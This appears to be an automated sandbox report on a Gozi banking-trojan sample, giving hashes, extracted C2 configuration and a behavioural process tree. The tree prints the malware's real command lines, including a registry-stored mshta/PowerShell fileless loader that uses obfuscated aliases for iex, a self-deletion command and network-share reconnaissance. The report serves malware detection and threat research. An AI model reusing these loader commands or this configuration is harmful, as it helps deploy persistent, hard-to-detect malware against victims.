Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
06-10-2023 08:12
Static task
static1
Behavioral task
behavioral1
Sample
9872c3c580e8bd1a22cd4698e73e3f9a.exe
Resource
win7-20230831-en
General
-
Target
9872c3c580e8bd1a22cd4698e73e3f9a.exe
-
Size
292KB
-
MD5
9872c3c580e8bd1a22cd4698e73e3f9a
-
SHA1
396576ffc8211cca1e4509e29f29e74883c626d2
-
SHA256
122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f
-
SHA512
34d7cd28bd24988c41b05911fa210f52a3f53a9106ea06e9edbc5f27e8cfeae50fb22cc3c5fa796e9514752e3b0f4c7733cb8942ce9686774b2b7b7dac1bea9d
-
SSDEEP
3072:zXTH4bYS/eQDmXepeDNbuSTTNG9AMY8q4LCvr4Uot:roYQeQEepeZTNG+MTasUo
Malware Config
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
mifrutty.com
systemcheck.top
-
base_path
/pictures/
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1860 set thread context of 1260 1860 powershell.exe Explorer.EXE PID 1260 set thread context of 1348 1260 Explorer.EXE cmd.exe PID 1348 set thread context of 1880 1348 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 1880 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
9872c3c580e8bd1a22cd4698e73e3f9a.exepowershell.exeExplorer.EXEpid process 1964 9872c3c580e8bd1a22cd4698e73e3f9a.exe 1860 powershell.exe 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1260 Explorer.EXE -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 1860 powershell.exe 1260 Explorer.EXE 1348 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1860 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 1260 Explorer.EXE -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.exedescription pid process target process PID 2504 wrote to memory of 1860 2504 mshta.exe powershell.exe PID 2504 wrote to memory of 1860 2504 mshta.exe powershell.exe PID 2504 wrote to memory of 1860 2504 mshta.exe powershell.exe PID 1860 wrote to memory of 2812 1860 powershell.exe csc.exe PID 1860 wrote to memory of 2812 1860 powershell.exe csc.exe PID 1860 wrote to memory of 2812 1860 powershell.exe csc.exe PID 2812 wrote to memory of 2792 2812 csc.exe cvtres.exe PID 2812 wrote to memory of 2792 2812 csc.exe cvtres.exe PID 2812 wrote to memory of 2792 2812 csc.exe cvtres.exe PID 1860 wrote to memory of 2704 1860 powershell.exe csc.exe PID 1860 wrote to memory of 2704 1860 powershell.exe csc.exe PID 1860 wrote to memory of 2704 1860 powershell.exe csc.exe PID 2704 wrote to memory of 2712 2704 csc.exe cvtres.exe PID 2704 wrote to memory of 2712 2704 csc.exe cvtres.exe PID 2704 wrote to memory of 2712 2704 csc.exe cvtres.exe PID 1860 wrote to memory of 1260 1860 powershell.exe Explorer.EXE PID 1860 wrote to memory of 1260 1860 powershell.exe Explorer.EXE PID 1860 wrote to memory of 1260 1860 powershell.exe Explorer.EXE PID 1260 wrote to memory of 1348 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1348 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1348 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1348 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1348 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1348 1260 Explorer.EXE cmd.exe PID 1348 wrote to memory of 1880 1348 cmd.exe PING.EXE PID 1348 wrote to memory of 1880 1348 cmd.exe PING.EXE PID 1348 wrote to memory of 1880 1348 cmd.exe PING.EXE PID 1348 wrote to memory of 1880 1348 cmd.exe PING.EXE PID 1260 wrote to memory of 1492 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1492 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1492 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1492 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1492 1260 Explorer.EXE cmd.exe PID 1348 wrote to memory of 1880 1348 cmd.exe PING.EXE PID 1348 wrote to memory of 1880 1348 cmd.exe PING.EXE PID 1260 wrote to memory of 1492 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1076 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1076 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1076 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1076 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1076 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1076 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1148 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1148 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1148 1260 Explorer.EXE cmd.exe PID 1148 wrote to memory of 1744 1148 cmd.exe net.exe PID 1148 wrote to memory of 1744 1148 cmd.exe net.exe PID 1148 wrote to memory of 1744 1148 cmd.exe net.exe PID 1260 wrote to memory of 1536 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1536 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1536 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1296 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1296 1260 Explorer.EXE cmd.exe PID 1260 wrote to memory of 1296 1260 Explorer.EXE cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\9872c3c580e8bd1a22cd4698e73e3f9a.exe"C:\Users\Admin\AppData\Local\Temp\9872c3c580e8bd1a22cd4698e73e3f9a.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1964 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Efj9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Efj9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C846A6CB-873B-3AC3-517C-AB0E15700F22\\\ContactClass'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name crwqtlfy -value gp; new-alias -name mmjffqibo -value iex; mmjffqibo ([System.Text.Encoding]::ASCII.GetString((crwqtlfy "HKCU:Software\AppDataLow\Software\Microsoft\C846A6CB-873B-3AC3-517C-AB0E15700F22").AboutWhite))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t7hmokrx.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5DDA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5DD9.tmp"5⤵PID:2792
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oadow8d8.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F31.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5F21.tmp"5⤵PID:2712
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\9872c3c580e8bd1a22cd4698e73e3f9a.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1880 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1492
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1076
-
C:\Windows\system32\cmd.execmd /C "net use >> C:\Users\Admin\AppData\Local\Temp\C64D.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\net.exenet use3⤵PID:1744
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C64D.bin1"2⤵PID:1536
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C64D.bin1 > C:\Users\Admin\AppData\Local\Temp\C64D.bin & del C:\Users\Admin\AppData\Local\Temp\C64D.bin1"2⤵PID:1296
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
87B
MD507d3da30511c28719dc83847c674d55f
SHA1a3252adde98e70212d6f134456f6289aae945fc2
SHA2568d23bec71dd61c2c7cd9c341b0570a1570e369a92cb33f75e93e23ec708f577d
SHA512318a3b9281a3022bb0503d47ae33f79d633740c30664050efdada15cd681df4c5bc16a1836c10e2249cf7f8e54a1bb4fe9b3ea8fdd724c46f68bb3a2ab0121a9
-
Filesize
87B
MD507d3da30511c28719dc83847c674d55f
SHA1a3252adde98e70212d6f134456f6289aae945fc2
SHA2568d23bec71dd61c2c7cd9c341b0570a1570e369a92cb33f75e93e23ec708f577d
SHA512318a3b9281a3022bb0503d47ae33f79d633740c30664050efdada15cd681df4c5bc16a1836c10e2249cf7f8e54a1bb4fe9b3ea8fdd724c46f68bb3a2ab0121a9
-
Filesize
87B
MD507d3da30511c28719dc83847c674d55f
SHA1a3252adde98e70212d6f134456f6289aae945fc2
SHA2568d23bec71dd61c2c7cd9c341b0570a1570e369a92cb33f75e93e23ec708f577d
SHA512318a3b9281a3022bb0503d47ae33f79d633740c30664050efdada15cd681df4c5bc16a1836c10e2249cf7f8e54a1bb4fe9b3ea8fdd724c46f68bb3a2ab0121a9
-
Filesize
1KB
MD5fd6200f68f812dd93d66b6a1c587f8b6
SHA15296306ea442e12a5f70c42357fe85b17eba4cc5
SHA25630452add99976f542b2ce4886109ca83a513b22ef7f11fde0fcc7c17f412a28c
SHA512edd9c5796bc1915edc016fa85ca975ec67e04e8af4221e9a6902d326f58f0dbd923bc0ac372d5ede80da4d92e3bf013bc40954d976540eda5fb41e7d9dc3ff73
-
Filesize
1KB
MD5273abdfa5891aa4533feb458bf3d338e
SHA1461d3e4fd0fe365f05012eb6628c9e19acde2de3
SHA256c3eac0707a722d1a838c86023fd6b6a83c158aae9e75cb13b621ca55a7c756b5
SHA512628f54f41b7eeb0dc6d440fa7dd04c48f98303e429b0fb7e9ab4f9a8a8d2fbf9f3ddccf5bacf0dfb82ae453987aa56793931cd2d8a2ca0567e3a1c529f8ed318
-
Filesize
3KB
MD5a57a67f414dd2ca030bcef3a1453fa15
SHA18abc34279275299c8bec2788b4da35cd21b7eeee
SHA25670eadc913de611be46da671817b3f1c620bd0e3e2e37753b9a6407964ba5a98b
SHA51288eb1eeb88fa0c7ac8e7d289a4a8325263ba5e75f7f58a105f28b9366284cae9924da7cfd17889897c9558ad26a448532d957db10d30166867674f68fbcbcc3a
-
Filesize
7KB
MD5bef5daaa3b57f962c274470107f32ae9
SHA1c966ae54edd8dff3f53f86606f5d50feeba78723
SHA256e5c92567dc740a3a170af80930bc14f208d14eed8b54c9fbd0d180768f294295
SHA512cf99d41dcffe794001106ef1c1fff944d1a7c22be4811fae83f171be00d77a236fb8c33e5b78e6dd8181f7987c441501f701474ea34b17a34dec518f8f4e8b50
-
Filesize
3KB
MD55c7f5b8f4ae8939235be4a934e398ec2
SHA124e194476d08acb6c7fde9b9c7f9dd6ce84d78dc
SHA2569e1670d3a39de95d33c71d5c9415ac44ec53b83e8859472323b4c2e86ca27627
SHA5120c379e9fa0172e1bd44747c34d32f370990cae132e751eb6e0f3a4abe9c2dd2551c061b39ad14dbc3b8f9d1d33e70e68083f524792a2bea8bf24d4c4bc97e6b9
-
Filesize
7KB
MD561d4c3bbaa705613242df2ddb0ebf70d
SHA17a8161eaa7c4c78c6358f07df5c5e71db98a6352
SHA256834672bccd7e399696e08581194517f489d4c03d71d96fdc00134c27d9f58f73
SHA5127233e1255d5632946a2d3cb7a883a4d27a46e9b9bbf1d3987d7eda5705e7fdb1969377a7e62289dcfb554da5c45832719f146ebada8534e9d4ad64d5d314191e
-
Filesize
652B
MD51fd57a04268ca838c48078552b404bc8
SHA1b0c99f80d4ab270ede3a55502403a3889ea026c2
SHA256481abfb36b617464ed0e783bba3a6e2bdb40d426ec3b181f2c12a4b8a0d3d884
SHA5122defdb236da4f0683c425f3b2b8f30ed862f96efdc8c3209d7a0950b8c781ef7df526b57975a2f1a7644fbba2ddc676ecb8ba9cd9340647e5014bde3a14b6af6
-
Filesize
652B
MD5202b3c939ada126f75dac031def464bf
SHA1e5f423ad8b5ea33ff3ea9c4e1e9ee4b2eac9971b
SHA2562084b053df538685b5cafc99b6c8f9cf454eb64a78cea655cda45e2b9d2325b1
SHA512f61921eee79429f143456875658a36a7f88e39bdca268bce542c65691cdaf97896c28659c855f0b871674427c69712b71ee48092945b9f3bc1f40341139e907f
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
309B
MD588ce5858f6da8381361c19e9902ceb7c
SHA144f259f9ddcae35c7915d17e0f478fcf434dedb9
SHA2562c120d8059113306f5ad542ee53e54de1ed66a8ec41150662eff5fa527e4b2cc
SHA51204fb8cc90cd9135b65079464867a7fd6e8c43651996f199caf9908582b5c8650a9673c26b88b95bc86e1043564f43f3872336a545e85219c7eb85b592ea5a703
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
309B
MD5b2c335d164938a915d9b2026640c410e
SHA146f405b5c4543f0b26edce593be544072a3c6167
SHA256b2cd0b32b6f0020cfd2a6b8f00ef141fe317dfd7a460204c3e156eb19d342ed6
SHA5124b479d824f6df6f7cd14b06d86de516b19abb38baca866f7fbb3be3e1cd62926e95b40429328c8ded1ae487a3c5b8374bb51cae037562f044dec130cf28ae444